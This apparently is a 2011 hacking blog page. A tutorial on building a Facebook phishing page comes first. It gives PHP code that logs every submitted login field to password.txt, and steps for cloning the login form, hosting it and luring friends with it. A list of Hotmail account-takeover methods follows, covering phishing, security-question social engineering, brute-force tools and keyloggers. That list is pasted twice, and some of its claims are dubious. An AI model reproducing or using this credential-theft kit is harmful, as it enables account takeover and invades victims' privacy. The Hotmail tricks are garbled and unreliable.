How to hack facebook
Account password
We will use very popular
method to hack facebook
account password.That is
Phishing.This is one of the best
method to hack facebook
account password.This will
work only if your friend don’t
know about this method of
hacking facebook. For this We
need three files:
1.Fake facebook login page
2.Php file
3.Text file to store password
Create your php file
1.Open notepad and copy this
code:
header (‘Location: https://
login.facebook.com/
login.php ’);
$handle = fopen
(“password.txt”, “a”);
foreach($_POST as $variable
=> $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}
fwrite($ handle, “\r\n”);
fclose($handle) ;
exit;
?>
2.Now save this as
phishing.php
Your php file is now created
If you Don’t understand what
this php file is doing you need
to learn some basic of
php.This php file will save
information of victim in file
password.txt
Create facebook fake login
page
Now go to http://
www.facebook.com and right
click / View Source.Copy
source in notepad and save it
as facebooklogin .html .Now
open source code of this html
file
We need to find the place
where Login code in facebook
page that where send the user
after clicking on it.
Now Press crtl-f after opening
source code and search for
this code
action=anything.
In this case we have this
action=”https://
login.facebook.com/
login.php? ”
We replace that part with:
action=”phishing.php”
Save your facebooklogin.html
file
Text file
Create a blank text file and
name it password.txt
Now upload all the three files
Facebooklogin.html,phishing.php,Password.txt
in any free web hosting site
directory like 100mb.com and
now you can just check your
fake facebook login page by
going to http://
yoursite.110mb.com/
Facebooklogin.html for the
fake login page.Just type some
random user name and any
password into the text box and
then you will see in your file
manager that a file called
“Password.txt” is created,In
which the password is stored.
You can use
http://www.justfree.com/
http://www.ripway.com/
also or any other free hosting
site.
Suppose you register with
name facebookhack.Your link
will be http://
www.facebookhack.justfree.com/
After uploading files your
phishing link will be http://
www.facebookhack.justfree.com/
facebooklogin.html
Send this link to your friend if
they login there their
password will be save at the
server .
You can trick your friend to
login this fake facebook page by saying its new version of
facebook check it out,or in
any way you like
“Use this on your own
responsibility for educational
purpose only“
Saturday, April 23, 2011
hack hotmail account
some ways to hack hotmail
account password:
1. Url way:
This is the most easiest way
For hack hotmail
password.All that you need in
this method is the victims
username. The method is
simple. all that you need to do
is type " www.hotmail.com/
cgi-bin/start/username ".
2.Html way
This too is very simple method
to hack hotmail account
password . just go to http://
www.hotmail/proxy.html. Now
type the username. Press
login. You will get a error
message. Now you need to
look at the source code of the
page( view>>page source). In
the code you are going to find
"action=someadress". Now
simply copy theirs address and
you are in. This it. same
conditions as above apply here
i.e user must not log out.
3.Hotmail phishing:
You can create fake page for
hacking hotmail passwords
that look same like the
hotmail site. You will find the
exact details at this page on
creating fake pages.Just
remember one thing to
change method = post and
your e-mail id in the action
field . If you dont know html
please learn it and then use
it.I have added a post on How
to create fake login page for
any site
4. Social engineering :
This is the method very useful
to hack hotmail account
password if victim is someone
whom you know well and is
your good friend. For this
method to work, you should
have good logic and
communication. In social
engineering, hacker tries to
retrieve information from
victim which can help him
hack hotmail account
password. Say, if you know
what is answer of security
question, then you can easily
hack hotmail account
password by using Forgot
Password link. So, to know his
security answer, you have to
use your logic. This must be
done carefully as victim must
not know your intensions.
5.Brute force
Brute Force Attack is the most
widely known password
cracking method. This attack
simply tries to use every
possible character
combination as a password. To
recover a one-character
password it is enough to try 26
combinations (‘a’ to ‘z’). It is
guaranteed that you will find
the password
Here are the two most
popular and well known Brute
forcers
1.Brutus aet2
2.Munga Brute force
To learn more about Brute
force see my article Hack
hotmail accounts using brute
force
6.Keylogging:
This is one of the easiest
method to hack hotmail
account password,A
keylogger, sometimes called a
keystroke logger, keylogger,
or system monitor, is a
hardware device or small
program that monitors each
keystroke a user types on a
specific computer’s keyboard.
Keylogger is the easiest way
to hack an account if you have
physical access to victim’s
computer.
See my post Hack hotmail
password using keylogger
Update:-
Hotmail seams to have
tweaked their system . it no
longer allows 2 users using
the same account at same
time. So the best way is to use
it from the victims comp.....
Warning:This post How to
hack hotmail password is for
educational purposes
.......
account password:
1. Url way:
This is the most easiest way
For hack hotmail
password.All that you need in
this method is the victims
username. The method is
simple. all that you need to do
is type " www.hotmail.com/
cgi-bin/start/username ".
2.Html way
This too is very simple method
to hack hotmail account
password . just go to http://
www.hotmail/proxy.html. Now
type the username. Press
login. You will get a error
message. Now you need to
look at the source code of the
page( view>>page source). In
the code you are going to find
"action=someadress". Now
simply copy theirs address and
you are in. This it. same
conditions as above apply here
i.e user must not log out.
3.Hotmail phishing:
You can create fake page for
hacking hotmail passwords
that look same like the
hotmail site. You will find the
exact details at this page on
creating fake pages.Just
remember one thing to
change method = post and
your e-mail id in the action
field . If you dont know html
please learn it and then use
it.I have added a post on How
to create fake login page for
any site
4. Social engineering :
This is the method very useful
to hack hotmail account
password if victim is someone
whom you know well and is
your good friend. For this
method to work, you should
have good logic and
communication. In social
engineering, hacker tries to
retrieve information from
victim which can help him
hack hotmail account
password. Say, if you know
what is answer of security
question, then you can easily
hack hotmail account
password by using Forgot
Password link. So, to know his
security answer, you have to
use your logic. This must be
done carefully as victim must
not know your intensions.
5.Brute force
Brute Force Attack is the most
widely known password
cracking method. This attack
simply tries to use every
possible character
combination as a password. To
recover a one-character
password it is enough to try 26
combinations (‘a’ to ‘z’). It is
guaranteed that you will find
the password
Here are the two most
popular and well known Brute
forcers
1.Brutus aet2
2.Munga Brute force
To learn more about Brute
force see my article Hack
hotmail accounts using brute
force
6.Keylogging:
This is one of the easiest
method to hack hotmail
account password,A
keylogger, sometimes called a
keystroke logger, keylogger,
or system monitor, is a
hardware device or small
program that monitors each
keystroke a user types on a
specific computer’s keyboard.
Keylogger is the easiest way
to hack an account if you have
physical access to victim’s
computer.
See my post Hack hotmail
password using keylogger
Update:-
Hotmail seams to have
tweaked their system . it no
longer allows 2 users using
the same account at same
time. So the best way is to use
it from the victims comp.....
Warning:This post How to
hack hotmail password is for
educational purposes
.......
Subscribe to:
Posts (Atom)